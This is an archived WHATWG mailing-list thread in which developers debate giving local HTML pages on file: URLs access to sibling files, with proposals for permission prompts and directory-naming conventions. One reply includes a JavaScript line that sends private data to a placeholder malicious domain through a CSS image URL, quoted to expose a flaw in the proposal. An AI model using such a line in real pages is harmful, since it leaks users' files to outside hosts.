brainstorming stuff, getting it tested/used in browsers, seeing what
sticks to the wall, and once things become stable the W3C hammers it
in stone. Is that assumption wrong?
A bit, they're more independent than that. (And we don't really
appreciate any copying that takes place. It's a lot less as of late,
but it still happens, as documented in e.g.,
https://annevankesteren.nl/2016/01/film-at-11 and
https://wiki.whatwg.org/wiki/Fork_tracking.)
--
https://annevankesteren.nl/
Anne van Kesteren
2017-04-18 08:38:28 UTC
Permalink
Post by Anne van Kesteren
Right, those are about making applications distributed over HTTPS work
when the user is not connected. That idea doesn't necessitate file
URLs and we're still working towards that ideal with Fetch, HTML, and
Service Workers. All browsers seem on board with that general idea
too, which is great.
But being able to access files added to a "subfolder" of said offline app
won't be possible I assume?
I'm not sure what that means. But you can still interact with the app
and do things with it, including storing data if the app allows such a
thing.
Maybe just adding the ability to ask the user if accessing this or that file
or this and that folder for indexing (and accessing the files within) would
be better.
There's <input type=file> and https://wicg.github.io/entries-api/.
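(For illustration, a minimal sketch of that capability-based approach,
using the non-standard but widely implemented webkitdirectory
attribute; what is done with each file is up to the app:)

  // Let the user grant access to a whole directory via a picker,
  // then read each file through the capability the picker returns.
  // webkitdirectory is non-standard but implemented in several engines.
  const input = document.createElement('input');
  input.type = 'file';
  input.webkitdirectory = true; // ask for a directory, not a single file
  input.addEventListener('change', () => {
    for (const file of input.files) {
      const reader = new FileReader();
      reader.onload = () =>
        console.log(file.webkitRelativePath, reader.result.length);
      reader.readAsText(file); // no access beyond what the user picked
    }
  });
  document.body.appendChild(input);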
Do the WHATWG and W3C meet/have a common group at all (for the
editors)? So that cross-group messes can be handled/avoided?
Well, we talk now and then and that has resulted in some improvements,
but it's also still ongoing and some within the W3C actively try to
make it worse (e.g., DOM is being forked again without a good reason).
So, nothing good thus far.
--
https://annevankesteren.nl/
duanyao
2017-04-18 10:35:26 UTC
Permalink
Post by Anne van Kesteren
Searching Google for "offline webapp discussion group" turns up
https://www.w3.org/wiki/Offline_web_applications_workshop
and that's sadly from 2011.
There is https://www.w3.org/TR/offline-webapps/
Right, those are about making applications distributed over HTTPS work
when the user is not connected. That idea doesn't necessitate file
URLs and we're still working towards that ideal with Fetch, HTML, and
Service Workers. All browsers seem on board with that general idea
too, which is great.
Offline web apps are great, but I'd say an offline web app is "an
online web app that can work offline temporarily", not really a local
web app. If the entity operating an offline web app goes out of service
permanently, the web app will soon stop working. This is one of the
reasons why local web apps are still relevant.
Delfi Ramirez
2017-04-14 17:35:20 UTC
Permalink
Hi all:

Agreed, David

Thank you very much for pointing us to the URL

https://fetch.spec.whatwg.org/#basic-fetch

BTW: It's not our mission to discourage users (netters) from -- ehem --
using a modern browser featured on their personal device for personal
purposes (as in the exercise of accessing internal HTML files, linked
internally or externally either to JSON data, text data -- uh, those
old CD-ROMs -- or other linked HTML files -- CSS and JS come to mind
here --).

This discouragement seems quite the opposite of what is defined in the
spec:

"For now, unfortunate as it is, file and ftp URLs [6] are left as an
exercise for the reader."

Just mumbling. Cheers.

---

Delfi Ramirez -- At Work

My digital signature [1]

0034 633 589231
***@segonquart.net [2]

twitter: @delfinramirez [3]
IRC: segonquart
Skype: segonquart [4]

http://segonquart.net

http://delfiramirez.info
[5]
Post by David Kendal
Post by Patrick Dark
The "world wide web" is the user-facing portion of the Internet. Files
on a CD or USB drive are not part of that.
You are continuing to dodge this problem by redefining the WHAT WG's
responsibilities. Please don't do that.
If you can't take my word for it, how about the inventor of the
web itself? <https://gitter.im/solid/chat?at=58ed246d408f90be66aeeb30>
(Thanks to a correspondent, who I presume prefers to remain unnamed,
for sending this to me off-list.)
As the divinely-appointed guardians of the HTML spec, the responsibility
of the WHAT WG is to ensure that HTML is a useful platform for documents
and applications wherever HTML files can be opened from, whether that's
HTTP(S), FTP, or local files. Where 'the web' starts and stops in this
spectrum of possible protocols is of no import.
On that note I also see that the Fetch API has stubbed out the
specification of file: and ftp: URL semantics for definition in the
future at <https://fetch.spec.whatwg.org/#basic-fetch>.
--
dpk (David P. Kendal) · Nassauische Str. 36, 10717 DE · http://dpk.io/
In politics, obedience and support are the same thing.
-- Hannah Arendt
Links:
------
[1] http://delfiramirez.info/public/dr_public_key.asc
[2] mail:%***@segonquart.net
[3] https://twitter.com/delfinramirez
[4] skype:segonquart
[5] http://delfiramirez.info
[6] https://url.spec.whatwg.org/#concept-url
Patrick Dark
2017-04-14 18:45:51 UTC
Permalink
Post by David Kendal
Post by Patrick Dark
The "world wide web" is the user-facing portion of the Internet. Files
on a CD or USB drive are not part of that.
You are continuing to dodge this problem by redefining the WHAT WG's
responsibilities. Please don't do that.
If you can't take my word for it, how about the inventor of the
web itself? <https://gitter.im/solid/chat?at=58ed246d408f90be66aeeb30>
(Thanks to a correspondent, who I presume prefers to remain unnamed,
for sending this to me off-list.)
"Appeal to authority" is a logical fallacy. An authoritative source
doesn't make an argument true.

I disagree with the idea that HTML files on offline media or a closed
intranet are part of the "world wide web".
Delfi Ramirez
2017-04-14 20:39:29 UTC
Permalink
Dear Patrick, dear David, dearest all:

There seems to be agreement that this may become a sterile debate, if
there is neither time to invest nor agreement on what should be done.

I propose, if there is any interest in the matter we are arguing, to
open a branch, so that those of us who have the will, who see the need,
and who have some spare time to invest in a possible solution (to be
presented in the future as an enhancement or a recommendation) can put
our hands to work.

Count me in, if there is a small group of devoted volunteers who want
to get their hands dirty, as an exercise, on file and ftp URLs [6] in
the Fetch spec featured in the WHATWG.

Sundays I'm on.

Regards

---

Delfi Ramirez -- At Work

My digital signature [1]

0034 633 589231
***@segonquart.net [2]

twitter: @delfinramirez [3]
IRC: segonquart
Skype: segonquart [4]

http://segonquart.net

http://delfiramirez.info
[5]
Post by Patrick Dark
The "world wide web" is the user-facing portion of the Internet. Files
on a CD or USB drive are not part of that. You are continuing to dodge this problem by redefining the WHAT WG's
responsibilities. Please don't do that.
If you can't take my word for it, how about the inventor of the
web itself? <https://gitter.im/solid/chat?at=58ed246d408f90be66aeeb30>
(Thanks to a correspondent, who I presume prefers to remain unnamed,
for sending this to me off-list.)
"Appeal to authority" is a logical fallacy. An authoritative source
doesn't make an argument true.

I disagree with the idea that HTML files on offline media or a closed
intranet are part of the "world wide web".



Links:
------
[1] http://delfiramirez.info/public/dr_public_key.asc
[2] mail:%***@segonquart.net
[3] https://twitter.com/delfinramirez
[4] skype:segonquart
[5] http://delfiramirez.info
[6] https://url.spec.whatwg.org/#concept-url
Delfi Ramirez
2017-04-12 11:03:57 UTC
Permalink
David: Agreed.

Shall we start to think about native modern browsers on desktops
(which are integrated with the DOM, as far as I have perceived),
touchscreens, connected to the web, and ASF or other networks (IoT
comes to mind)?

A modern, DOM-updated version of the known trick

[autorun]
shellexecute=path\to\htmlfile.html

would be of use.

Kind regards

---

Delfi Ramirez -- At Work

My digital signature [1]

0034 633 589231
***@segonquart.net [2]

twitter: @delfinramirez [3]
IRC: segonquart
Skype: segonquart [4]

http://segonquart.net

http://delfiramirez.info
[5]
Post by David Kendal
Post by Domenic Denicola
Bingo. This mailing list is for developing technology for the world
wide web, not for peoples' local computers.
The World Wide Web includes peoples' own computers. file:// is a URI
scheme for exactly that reason. Every browser since WorldWideWeb.app
for the NeXT has supported it, and every browser will support it
forever, I hope. (Until it gets the <ISINDEX> treatment, I suppose,
since the current generation of web standards writers seem to regard
the idea of platform stability with extreme contempt.)
You cannot escape this simply by redefining what you consider 'the web'
to be.
(file:// is even 'world wide', to some extent. On computers with AFS
installed, all URIs beginning with file:///afs/ will always resolve to
the exact same files.)
--
dpk (David P. Kendal) · Nassauische Str. 36, 10717 DE · http://dpk.io/
If one meets a powerful person [...] one can ask five questions: what
power do you have; where did you get it; in whose interests do you
exercise it; to whom are you accountable; and, how can we get rid of
you? Anyone who cannot answer the last of those questions does not
live in a democratic system. -- Tony Benn, Commons deb., 16 Nov. 1998
Links:
------
[1] http://delfiramirez.info/public/dr_public_key.asc
[2] mail:%***@segonquart.net
[3] https://twitter.com/delfinramirez
[4] skype:segonquart
[5] http://delfiramirez.info
Melvin Carvalho
2017-04-11 16:47:14 UTC
Permalink
Post by Patrick Dark
I can't see this being addressed. The only good reason to distribute an
application this way is because you want it to be confidential and there's
no incentive to accommodate what one might call "walled gardens"
in HTML because they naturally have a limited audience.
Bingo. This mailing list is for developing technology for the world wide
web, not for peoples' local computers.
That is one perspective of the world wide web. But perhaps not a
perspective shared by all.

Another view, which I think is held by many, is that you should equally
be able to access public data on the web, data in the cloud, and
personal data on your machine.
You can use the same technology that people use on the web for local app
development---many people do, e.g. Apache Cordova, Microsoft's
Metro/Modern/UWP apps, or GitHub's Electron. But all those technologies are
outside the standards process, and in general are not the focus of browser
vendors in developing their products (which are, like the standards
process, focused on the web). The same is true of file: URLs.
Yes, I'm currently using Electron for this, but I would much prefer to
use the browser. If a browser has this restriction, I'd simply like a
way to turn it off. It's a heavily requested feature; why wouldn't an
open source browser be a suitable target for such an improvement (and
thereby gain market share)?
David Kendal
2017-04-11 16:42:05 UTC
Permalink
Post by Patrick Dark
I can't see this being addressed. The only good reason to distribute
an application this way is because you want it to be confidential and
there's no incentive to accommodate what one might call "walled
gardens" in HTML because they naturally have a limited audience. For
example, if your application is being distributed via CD, that implies
that that number of application instances will be limited to the
number of physical media items, that the application will never be
updated, and that the application therefore isn't particularly
important.
I object strongly to this inference.

Let's approach this problem from the other end. This is the problem I'm
actually trying to solve, and I've concluded that the web platform,
distributed on CD-ROM, may be the best approach. Please suggest another
way to distribute something which is:

(a) stable, as in won't disappear when the publisher dies or goes out of
business and stops paying hosting bills;
(b) archivable, as in won't degrade significantly over the medium term
when stored;
(c) portable, as in not tied to any particular API;
(d) forward-compatible, as in will very probably run on future computer
architectures and operating systems in the long term, regardless of
system call or GUI API changes.

I am genuinely asking for suggestions for a better approach. HTML files
on CD are *vital* for certain kinds of large ebooks to survive the ages.
But if you want to make them interactive, you're hamstrung by the lack
of cross-browser support for XHR/Fetch for files on the same medium.

Bundling an HTTP server on the disc would break (c) and (d), though one
could depend on the capabilities of future software archaeologists to
simply run their own servers for the content.
--
dpk (David P. Kendal) · Nassauische Str. 36, 10717 DE · http://dpk.io/
The reason we had no idea how cats worked was because, since Newton,
we had proceeded by the simple principle that essentially, to see how
things work, we took them apart. If you try and take a cat apart to
see how it works, the first thing you have on your hands is a non-
working cat. — Douglas Adams
David Kendal
2017-04-14 21:43:09 UTC
Permalink
To set aside the previous thread, I'd like to make a renewed call for
input on my actual proposal, including counter-proposals, potential
flaws in my design, etc.

Then perhaps we can make some progress here.

dpk
Post by David Kendal
Moin,
Over the last few years there has been a gradual downgrading of support
in browsers for running pages from the file: protocol. Most browsers now
have restrictions on the ability of JavaScript in such pages to access
other files.
Both Firefox and Chrome seem to have removed this support from XHR, and
there appears to be no support at all for Fetching local files from
other local files. This is an understandable security restriction, but
there is no viable replacement at present.
This is a shame because there are many possible uses for local static
files accessing other local static files: the one I have in mind is
shipping static files on CD-ROM or USB stick, but there is also the more
obvious (and probably more common) use of local files by developers
prototyping their apps before deploying them live to an HTTP server.
This is an inconvenience to many web developers, and I'm far from the
only one to complain about it. For instance, this from a very prolific
Chrome bug reporter: "I've filed hundreds of Chrome bugs and I would
rather see this fixed than any of them"
in <https://bugs.chromium.org/p/chromium/issues/detail?id=47416>. That
bug was the number two most starred Blink bug in 2016.
I'd like to see APIs that solve this problem securely, in a way that's
portable across all browsers. I know this isn't trendy or sexy but
'single-page apps' are still in vogue (I think?) and it would be
useful/cool to be able to run them locally, even only for development
purposes.
window.requestFilesystemPermission(requestedOrigin);
which does something like
- If permission was already granted for the specified requestedOrigin or
some parent directory of it, return true.
- If the current page origin is not a URL on the file: protocol, raise a
permissions error.
- If requestedOrigin does not share a root path with the current page
origin, raise a permissions error. That is, a file with the name
file:///mnt/html/index.html can request access to file:///mnt or to
file:///mnt/html, but *not* to file:///etc, where it could read the
local password file.
- The browser displays an alert to the page user showing the name and
path to the directory which has requested this permission. The user
can then choose to allow or deny access.
- If the user chose not to allow access to the files, false is returned
or some other error is raised.
- If they chose to allow access, return true.
- For the remainder of the session (user agent specific), all files
in the requestedOrigin directory, including the current page, have
total read access (with Fetch, XHR, etc.) to all other files in
the directory.
requestedOrigin is allowed to be an absolute or relative URI.
Some useful Fetch semantics for file: URLs should also be defined.
I like this solution because it maintains portability of scripts between
HTTP(S) and local files without too much extra programming work: if
scripts only request relative URLs, they can both (a) detect that
they're running locally from file: URLs, and request permission if so
and (b) detect that they're running on HTTP, and make exactly the same
API calls as they would on the local system.
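(To illustrate the intended usage -- a minimal sketch, assuming the
proposed requestFilesystemPermission API existed and returned a boolean
as described above; the fetched path is hypothetical:)

  // Hypothetical: only works if the proposal above were implemented.
  if (location.protocol === 'file:') {
    // Running locally: ask for read access to our own directory.
    if (!window.requestFilesystemPermission('.')) {
      throw new Error('User denied local file access');
    }
  }
  // The same relative URL now works over both http(s): and file:.
  fetch('data/config.json')
    .then(response => response.json())
    .then(config => console.log(config));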
This is also a beneficial property for those using file:// URLs for
development purposes.
Of course, this is just one solution that's possible. I would welcome
feedback on this proposal and any progress towards any solution to this
very common problem.
Thanks,
--
dpk (David P. Kendal) · Nassauische Str. 36, 10717 DE · http://dpk.io/
<+grr> for security reasons I've switched to files:// urls instead
Patrick Dark
2017-04-15 00:09:41 UTC
Permalink
Post by David Kendal
window.requestFilesystemPermission(requestedOrigin);
which does something like
- If permission was already granted for the specified requestedOrigin or
some parent directory of it, return true.
- If the current page origin is not a URL on the file: protocol, raise a
permissions error.
- If requestedOrigin does not share a root path with the current page
origin, raise a permissions error. That is, a file with the name
file:///mnt/html/index.html can request access to file:///mnt or to
file:///mnt/html, but *not* to file:///etc, where it could read the
local password file.
- The browser displays an alert to the page user showing the name and
path to the directory which has requested this permission. The user
can then choose to allow or deny access.
- If the user chose not to allow access to the files, false is returned
or some other error is raised.
- If they chose to allow access, return true.
- For the remainder of the session (user agent specific), all files
in the requestedOrigin directory, including the current page, have
total read access (with Fetch, XHR, etc.) to all other files in
the directory.
So if you put this file in the Windows Downloads directory, then it has
read access to all download files even though they aren't related? And
it grants access to all of those files—some of which may also be
HTML-based applications—again, even if they aren't related? If the user
is instructed to place it in the root directory and then grants it
permissions, it has access to read the entire operating system?

What if the file is used to dynamically write a CSS style declaration as in:

some_element.style.setProperty("background-image",
"url('http://maliciousdomain.com/?private-info=" + private_info + "')");

How do you address this security hole?
David Kendal
2017-04-15 09:58:57 UTC
Permalink
Post by Patrick Dark
So if you put this file in the Windows Downloads directory, then it
has read access to all download files even though they aren't related?
And it grants access to all of those files—some of which may also be
HTML-based applications—again, even if they aren't related? If the
user is instructed to place it in the root directory and then grants
it permissions, it has access to read the entire operating system?
some_element.style.setProperty("background-image", "url('http://maliciousdomain.com/?private-info=" + private_info + "')");
How do you address this security hole?
Ah, well, that's why you have to ask the user. The prompt should make
clear that this is a possibility -- something like:

"The webpage ‘[title]’ wants to access files in the folder ‘[name]’.
The webpage will be able to open and read from, but not modify, all
the files in this folder and may be able to send information from those
files to third parties. You should not do this if you do not trust the
source of this webpage. Do you want to allow this?"
[or whatever -- I'm not a UI text writer and something shorter would
probably be better, it's up to browser makers]

Alternatively, the Right Thing might be to say that once you've got
local file access you can't load images, scripts (etc.) over HTTP. That
might be oppressively restrictive for the use case where developers are
using file URLs for development though (they might still want assets
like JS libraries from a CDN).

Basically, I'm willing to trust users to know that files running from
their local computer might affect other things on their local computer
-- especially when warned about it explicitly. After all, as others have
pointed out, the same vulnerability is there when you take the option of
shipping an HTTP server with the HTML files. And, in fact, it's worse
because the HTTP server has no sandboxing to a particular area of the
filesystem and *doesn't* generally warn the user before it gains total
filesystem access.
--
dpk (David P. Kendal) · Nassauische Str. 36, 10717 DE · http://dpk.io/
+49 159 03847809
we do these things not because they are easy,
but because we thought they were going to be easy
— 'The Programmers' Credo', Maciej Cegłowski
Philipp Serafin
2017-04-15 13:09:54 UTC
Permalink
If I see this correctly, we're currently talking about two different
use-cases for file/directory access:

1) Giving HTML apps the ability to "open" and edit local user-provided
files and directories in a similar manner to desktop apps (the soundboard
example)

2) Loading (parts of) the app itself from a local filesystem, possibly
without any network access being available at all (the CD rom example).

Maybe the security would be easier to handle if both use-cases were
dealt with separately. I think the two use-cases have different
requirements, non-requirements and "prior art":

1) requires that file/directory paths be passed by the user dynamically,
but does not (to my knowledge) require that the app accesses any paths
*not* given by the user (if you treat a directory as "all paths within
it"). Maybe you could build upon the existing capability-based system used
for file input here: e.g. some extended file control that gives an app
enumerate/write access to the selected file or directory, but doesn't
allow it access to anything else.

2) sounds like an extension of offline apps to me. Maybe this could be
solved by defining some kind of package format for service workers and
cached resources, so service workers can be installed without any network
access.
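(For context, a minimal sketch of the service-worker side such a
package would feed, using the standard Cache API; how the cache gets
pre-populated from the package is exactly the part that would need
defining:)

  // sw.js -- serve everything from a pre-populated cache, falling back
  // to the network, so the app keeps working with no network at all.
  self.addEventListener('fetch', event => {
    event.respondWith(
      caches.match(event.request)
        .then(cached => cached || fetch(event.request))
    );
  });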
On 15 Apr 2017, at 01:09, Patrick Dark wrote:
Post by Patrick Dark
So if you put this file in the Windows Downloads directory, then it
has read access to all download files even though they aren't related?
Ah, well, that's why you have to ask the user. The prompt should make
Patrick makes a good point.
For example, asking a user if it's OK for the HTML document to access
stuff in "C:\Users\Username\AppData\Local\Temp\" -- what do you think
most users will do?
Just click OK; after all, "they" have nothing important in that folder,
their stuff is in "Documents" instead.
Maybe an HTML document could have an offline-mode parameter of some
sort: if the document is in the temp folder then it is put in a virtual
subfolder and can only access folders/files under that.
If it is not in the temp folder (or another such folder)
then a list of folders needs to be provided.
For example
d:\Myhtmlapp\index.html (automatic as the document can access itself)
d:\Myhtmlapp\js\ (the javascript linked in the document is stored here)
d:\Myhtmlapp\css\ (the css linked in the document is stored here)
d:\Myhtmlapp\sounds\ (sounds to be indexed/used by the document, i.e a
soundboard)
This way an HTML app will work as a single-file document on its own (as
it does today) or with specified subfolders. It would not have access
to anything outside the specified subfolders or files.
Open file and Save File requesters on the other hand could be allowed
outside those folders as those are directly controlled by the user.
Indexing/parsing of files in non-app subfolders is another issue that
will require a different take (listing filenames/sizes/dates).
How to specify subfolders I'm not sure -- a document header? Or maybe
leverage the current work on Offline Webapps, which uses a separate
file?
Browsers also need to make sure that a file is not added to the temp
folder that enables access to subfolders. (The root of the temp folder
should always be treated as special regardless.)
--
Roger Hågensen,
Freelancer, Norway.
Jeffrey Yasskin
2017-04-20 14:15:21 UTC
Permalink
Post by Philipp Serafin
If I see this correctly, we're currently talking about two different
1) …
2) Loading (parts of) the app itself from a local filesystem, possibly
without any network access being available at all (the CD rom example).
Maybe the security would be easier to handle if dealt with both use-cases
separately. I think both use-cases have different requirements,
1) …
2) sounds like an extension of offline apps to me. Maybe this could be
solved by defining some kind of package format for service workers and
cached resources, so service workers can be installed without any network
access.
FWIW, we're working on such a packaging format in
https://github.com/dimich-g/webpackage. It's still early, and we haven't
yet described how to do things like check certificate and package
revocation, but it's got the overall direction we're thinking about.

Jeffrey

David Kendal
2017-04-15 17:54:04 UTC
Permalink
Patrick makes a good point.
For example, asking a user if it's OK for the HTML document to access
stuff in "C:\Users\Username\AppData\Local\Temp\" -- what do you think
most users will do?
Just click OK; after all, "they" have nothing important in that folder,
their stuff is in "Documents" instead.
This is why I added the restriction that pages can only request access
to directories that are parents of the directory they're in. I admit I
don't actually know much about how Windows lays out files these days --
if the 'Downloads' folder is within some other folder that also contains
a load of private stuff. If so, or if that's so on some other popular
OS, maybe I'm wrong.

Browsers could also add restrictions that you can't request access to
the root directory or top-level subdirectory of an OS volume, or what-
ever else is needed for appropriate security on a particular OS.
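(A rough sketch of the containment check a browser might apply,
assuming plain path-prefix matching on file: URLs; this glosses over
the per-OS normalization issues raised earlier in the thread:)

  // May a page at pageURL request access to requestedURL?
  // Assumes both are file: URLs with already-normalized paths.
  function mayRequestAccess(pageURL, requestedURL) {
    const pageDir = new URL('.', pageURL).pathname;   // page's directory
    const requested = new URL(requestedURL, pageURL).pathname;
    if (!requested.endsWith('/')) return false;  // must name a directory
    if (!pageDir.startsWith(requested)) return false; // parent dirs only
    if (requested === '/') return false;         // never the volume root
    return true;
  }
  // mayRequestAccess('file:///mnt/html/index.html', 'file:///mnt/')
  //   -> true
  // mayRequestAccess('file:///mnt/html/index.html', 'file:///etc/')
  //   -> false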

Some participants on the Chrome bug thread suggested that Chrome could
look for some hidden file that would give files in the directory under
it XHR/Fetch access to that directory. That seems similar to what you
suggest, but I dislike the idea of a hidden file doing this unbeknownst
to users -- and even if it were visible, its function may not be obvious.
--
dpk (David P. Kendal) · Nassauische Str. 36, 10717 DE · http://dpk.io/
+49 159 03847809
Gott schütze mich vor Staub und Schmutz, vor Feuer, Krieg und
Denkmalschutz. ("God protect me from dust and dirt, from fire, war,
and heritage preservation.")
— seen on an old building in Bamberg, Bavaria
Patrick Dark
2017-04-15 23:45:52 UTC
Permalink
Post by David Kendal
Patrick makes a good point.
For example, asking a user if it's OK for the HTML document to access
stuff in "C:\Users\Username\AppData\Local\Temp\" -- what do you think
most users will do?
Just click OK; after all, "they" have nothing important in that folder,
their stuff is in "Documents" instead.
This is why I added the restriction that pages can only request access
to directories that are parents of the directory they're in. I admit I
don't actually know much about how Windows lays out files these days --
if the 'Downloads' folder is within some other folder that also contains
a load of private stuff. If so, or if that's so on some other popular
OS, maybe I'm wrong.
"Downloads" is a sibling directory of "Documents" and child directory of
the user directory on Windows 10. Since this is a catch-all downloads
folder, it may contain sensitive files, so I'd imagine allowing an HTML
file to read everything in this directory would be viewed as an
unacceptable security risk.
Post by David Kendal
Browsers could also add restrictions that you can't request access to
the root directory or top-level subdirectory of an OS volume, or what-
ever else is needed for appropriate security on a particular OS.
I'd also imagine it unlikely that anyone would want to implement a
directory-dependent (i.e., operating system-dependent) JavaScript API.

It seems that what you'd need is not a new JavaScript API, but a totally
new application/manifest format like *.htmlapp that contains the HTML
file. This would guarantee that the HTML file is scoped to a safe
quasi-directory.

However, this presents a problem since you then need viewers/editors
created for this niche format to be able to easily modify the offline
application. Further, this format would be a competitor format to
operating system-dependent application formats, so there'd be market
incentive *against* a native implementation. Why would Microsoft, for
example, want to add support for this offline application format when
they'd like you to create a Windows Store app instead?
duanyao
2017-04-17 11:53:27 UTC
Permalink
Post by David Kendal
Patrick makes a good point.
For example, asking a user if it's OK for the HTML document to access
stuff in "C:\Users\Username\AppData\Local\Temp\" -- what do you think
most users will do?
Just click OK; after all, "they" have nothing important in that folder,
their stuff is in "Documents" instead.
This is why I added the restriction that pages can only request access
to directories that are parents of the directory they're in.
Maybe this is not enough.

The directories which users save web pages to usually also contain
large amounts of personal data, e.g. "C:/Users/<user
name>/Documents|Downloads" on Windows and "/home/<user
name>/Documents|Downloads" on Linux. The temp directory is also
sensitive.

Asking permission for a sensitive directory is not ideal: users either
lose the functionality of the saved page, or risk losing privacy.
Post by David Kendal
I admit I
don't actually know much about how Windows lays out files these days --
if the 'Downloads' folder is within some other folder that also contains
a load of private stuff. If so, or if that's so on some other popular
OS, maybe I'm wrong.
Browsers could also add restrictions that you can't request access to
the root directory or top-level subdirectory of an OS volume, or what-
ever else is needed for appropriate security on a particular OS.
It is impractical to blacklist all sensitive directories, because many
users use customized data directories, e.g. "D:/work" or "D:/MyData".
Post by David Kendal
Some participants on the Chrome bug thread suggested that Chrome could
look for some hidden file that would give files in the directory under
it XHR/Fetch access to that directory. That seems similar to what you
suggest, but I dislike the idea of a hidden file doing this unbeknownst
to users -- and even if it were visible, its function may not be obvious.
The major problem with this solution is that users may be tricked into
downloading such a configuration file to a sensitive directory, opening
a hole permanently.

Here is my solution: restrict local file access to certain directory
naming patterns.

The use cases of local HTML files can be divided into two types:
single-page applications and multi-page applications.

For a single-page application, browsers restrict `foo.html`'s
permission to `foo_files/` in the same parent directory. Note that it
is already a common practice for browsers to save a page's resources to
a `xxx_files/` directory; browsers just need to grant the permission to
`xxx_files/`.

For a multi-page application, browsers require that its "application
root directory" ends with `_webrun` (or another sensible name). All
files within an `xxx_webrun/` directory are treated as same-origin, but
they can't access files outside of the `xxx_webrun/`.

There is no need to ask users for permission to `xxx_files/` or
`xxx_webrun/` directories. For HTML files without such directories,
access to local files may not be allowed.

It is much less likely that users would unintentionally put files into
an existing `xxx_files/` or `xxx_webrun/` directory, or be tricked into
doing so, so the security risk is minimized. Browsers can even enforce
it: warn users when they try to save a file into an existing
`xxx_files/` or `xxx_webrun/` directory.
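(A rough sketch of how a browser might evaluate such a request under
this convention; the function name and exact rules are illustrative
only, and paths are assumed to be normalized file: URL pathnames:)

  // May a local page at pagePath read targetPath under the
  // naming-convention rules described above?
  function isLocalAccessAllowed(pagePath, targetPath) {
    // Multi-page app: both files live under the same `xxx_webrun/` root.
    const run = pagePath.match(/^(.*_webrun\/)/);
    if (run && targetPath.startsWith(run[1])) return true;
    // Single-page app: `foo.html` may read its sibling `foo_files/`.
    const sp = pagePath.match(/^(.*\/)([^\/]+)\.html?$/);
    if (sp && targetPath.startsWith(sp[1] + sp[2] + '_files/')) {
      return true;
    }
    return false;
  }
  // isLocalAccessAllowed('/docs/test.html',
  //                      '/docs/test_files/page2.html') -> true
  // isLocalAccessAllowed('/docs/test.html', '/etc/passwd') -> false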


Regards,

Duan, Yao.
duanyao
2017-04-17 13:22:20 UTC
Permalink
Post by duanyao
For a single-page application, browsers restrict `foo.html`'s
permission to `foo_files/` in the same parent directory. Note that it
is already a common practice for browsers to save a page's resources
to a `xxx_files/` directory; browsers just need to grant the
permission to `xxx_files/`.
I like that idea. But there is no need to treat single and multi-page
applications differently, is there?
d:\documents\test.html
d:\documents\test.html_files\page2.html
d:\documents\test.html_files\page3.html
This can handle multipage fine as well.
Anything in the folder test.html_files is considered sandboxed under
test.html
The problem is, what if users open `test_files\page2.html` or
`test_files\page3.html` directly? Can they access
`test_files\config.json`? This is to be solved by the "multi-page
application" convention. By the way, the name of the directory is
usually `foo_files`, not `foo.html_files`.
This would allow a user (for a soundboard) to drop audio files into
d:\documents\test.html_files\sounds\jingle\
d:\documents\test.html_files\sounds\loops\
and so on.
And if writing ability is added to JavaScript then write permission
could be given to those folders (so audio files could be created and
stored without "downloading" them each time).
I just checked what naming Chrome uses: it takes the page title and
adds _files to it. I can't recall what the other browsers do.
Chrome can be configured to ask for location when saving a page, then
you can name it as you will.
The "xxx_files" convention was introduced by IE or Netscape long ago,
and other browsers just follow it.
So granting the HTML file read/write/listing permissions on that
folder and its subfolders would certainly make single-page offline
apps possible.
Yeah, I think it is unlikely to be harmful to allow write/listing
permission as well.
I have not tested how editing/adding to this folder affects things;
deleting the html file also deletes the folder (at least on Windows
10, and I seem to recall on Windows 7 as well).
There is no magic link between `foo.html` and `foo_files/`; this is
just a trick of Windows Explorer. You can change things by hand in
that directory as you will.
I'm not sure if an offline app needs the folder linked to the html
file or not.
A web developer might create the folder manually, in which case there
will be no link. And if zipped and moved to a different
system/downloaded by users, then any such html-and-folder linking will
be lost as well.
Maybe instead of d:\documents\test.html_files\,
d:\documents\test.html_data\ could be used?
This would also distinguish it from current user-saved webpages.
duanyao
2017-04-18 10:17:28 UTC
Permalink
Post by duanyao
This can handle multipage fine as well.
Anything in the folder test.html_files is considered sandboxed under
test.html
The problem is, what if users open `test_files\page2.html` or
`test_files\page3.html` directly? Can they access
`test_files\config.json`? This is to be solved by the "multi-page
application" convention. By the way, the name of the directory is
usually `foo_files`, not `foo.html_files`.
Good point. But why would a user do that when the entry point is the
test.html?
The user may bookmark it and access it later on; the tab may be
restored from a previous browser session; the user may open it from
the history list, and so on.
In this case the browser could just fall back to the default behavior
for local html files.
Agree.
Alternatively the browser could have some logic that knows that this
is a page under the test folder, which is the sandbox for test.html.
Also, your example of "test_files\page3.html" and
"test_files\config.json": of course page3.html could access it, just
like it could access config.js if not for CORS on XHR and local files.
Maybe no. "files" is a generic word, so if you make every "xxx_files/"
folders magical, it's quite possible that there are folders happen to
ends with "_files" but are not intented to be local web apps. If you
require a `xxx.html` to make "xxx_files/" magical, it is a little
awkward and confusing for muli-page app.

This is why I propose a new (and unlikely already used) pattern
`xxx_webrun/` for more powerful muli-page app, and limit `xxx_files/` to
single page app.

In single page app case, it would be more common that `test.html` gets
`test_files\page{2|3}.html` via XHR and renders the latter in place,
instead of navigating to it.
So the latter don't need to access `test_files\config.json` themselves.
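(A minimal sketch of that render-in-place pattern, assuming XHR were
permitted for the page's own `xxx_files/` directory; the element id is
hypothetical:)

  // test.html pulls a fragment from its own _files directory and
  // renders it in place instead of navigating to it.
  var xhr = new XMLHttpRequest();
  xhr.open('GET', 'test_files/page2.html');
  xhr.onload = function () {
    document.getElementById('content').innerHTML = xhr.responseText;
  };
  xhr.send();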
Actually a lot of the issue here is XHR (and fetch) not being possible
for local web pages.
The only reason I suggested using the same naming convention for the
sandbox folder is that (at least on Windows) Explorer deletes both the
html and the folder together, something users are familiar with.
Though I'm sure Microsoft could add support for the same with another
folder naming convention, I can't see that being backported to Windows
8.1/8/7.
The `xxx_webrun/` convention doesn't need the OSes' support, just the
browsers'; and you just delete that folder to delete the app
completely.
Post by duanyao
I just checked what naming Chrome uses: it takes the page title and
adds _files to it. I can't recall what the other browsers do.
Chrome can be configured to ask for location when saving a page, then
you can name it as you will.
The "xxx_files" convention was introduced by IE or Netscape long ago,
and other browsers just follow it.
...
I have not tested how editing/adding to this folder affects things;
deleting the html file also deletes the folder (at least on Windows
10, and I seem to recall on Windows 7 as well).
There is no magic link between `foo.html` and `foo_files/`, this is just
a trick of Windows Explorer. You can change things by hand in that
directory as you will.
I just confirmed that: just creating an empty .html file and a
same-named folder with _files at the end does "link" them in Explorer.
Is this unique to Windows, or do other platforms do the same/something
similar?
Probably just Windows Explorer. At least the Nautilus file manager on
Linux doesn't do the trick.
Ashley Sheridan
